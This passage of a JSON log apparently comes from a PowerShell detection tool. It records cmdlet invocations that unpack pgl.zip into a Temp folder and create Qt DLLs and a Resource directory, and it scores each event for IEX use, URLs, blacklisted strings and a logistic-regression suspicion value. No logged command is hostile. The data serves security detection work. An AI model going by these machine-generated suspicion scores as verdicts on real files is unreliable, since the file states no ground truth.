\"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181211", "time": {"SystemTime": "2024-10-18T10:27:57.8652189Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtCore4.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtCore4.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181213", "time": {"SystemTime": "2024-10-18T10:27:58.0206608Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181215", "time": {"SystemTime": "2024-10-18T10:27:58.0210516Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"9\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"9\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181216", "time": {"SystemTime": "2024-10-18T10:27:58.0216282Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtGui4.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtGui4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181217", "time": {"SystemTime": "2024-10-18T10:27:58.0222782Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtGui4.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtGui4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181218", "time": {"SystemTime": "2024-10-18T10:27:58.0229676Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181219", "time": {"SystemTime": "2024-10-18T10:27:58.3847912Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtGui4.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtGui4.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181221", "time": {"SystemTime": "2024-10-18T10:28:11.6689020Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181223", "time": {"SystemTime": "2024-10-18T10:28:11.6693580Z"}, "totalscore": {"totalscore": 41.9214231289426, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.9214231289426, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"10\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"10\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.419214231289426, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181224", "time": {"SystemTime": "2024-10-18T10:28:11.6702509Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtNetwork4.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtNetwork4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181225", "time": {"SystemTime": "2024-10-18T10:28:11.6710937Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtNetwork4.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtNetwork4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181226", "time": {"SystemTime": "2024-10-18T10:28:11.6718944Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181227", "time": {"SystemTime": "2024-10-18T10:28:11.6965645Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtNetwork4.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtNetwork4.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181229", "time": {"SystemTime": "2024-10-18T10:28:12.3908353Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181231", "time": {"SystemTime": "2024-10-18T10:28:12.3915218Z"}, "totalscore": {"totalscore": 41.75026783716634, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.75026783716634, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"11\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"11\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.4175026783716634, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181232", "time": {"SystemTime": "2024-10-18T10:28:12.3923738Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtXml4.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtXml4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181233", "time": {"SystemTime": "2024-10-18T10:28:12.3933485Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtXml4.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtXml4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181234", "time": {"SystemTime": "2024-10-18T10:28:12.3943510Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181235", "time": {"SystemTime": "2024-10-18T10:28:12.4136304Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtXml4.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtXml4.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181237", "time": {"SystemTime": "2024-10-18T10:28:14.0602702Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181239", "time": {"SystemTime": "2024-10-18T10:28:14.0606108Z"}, "totalscore": {"totalscore": 41.94379728465864, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.94379728465864, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"12\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"12\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41943797284658646, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181240", "time": {"SystemTime": "2024-10-18T10:28:14.0611178Z"}, "totalscore": {"totalscore": 46.652752419985084, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.652752419985084, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46652752419985083, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181241", "time": {"SystemTime": "2024-10-18T10:28:14.0657585Z"}, "totalscore": {"totalscore": 51.012919429460865, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 51.012919429460865, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5101291942946087, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181242", "time": {"SystemTime": "2024-10-18T10:28:14.1184839Z"}, "totalscore": {"totalscore": 70.3776474529961, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 70.3776474529961, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Item): \"New-Item\"\nParameterBinding(New-Item): name=\"ItemType\"; value=\"Directory\"\nParameterBinding(New-Item): name=\"Confirm\"; value=\"False\"\nParameterBinding(New-Item): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\n", "removed_backtick": "CommandInvocation(New-Item): \"New-Item\"\nParameterBinding(New-Item): name=\"ItemType\"; value=\"Directory\"\nParameterBinding(New-Item): name=\"Confirm\"; value=\"False\"\nParameterBinding(New-Item): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.703776474529961, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181243", "time": {"SystemTime": "2024-10-18T10:28:14.1244032Z"}, "totalscore": {"totalscore": 48.62633183162733, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 48.62633183162733, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.48626331831627334, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181244", "time": {"SystemTime": "2024-10-18T10:28:14.1464500Z"}, "totalscore": {"totalscore": 57.02957879083289, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 57.02957879083289, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Adding 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Adding 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5702957879083289, "randomized_string": 0, "detect_strings_blacklist": []}, 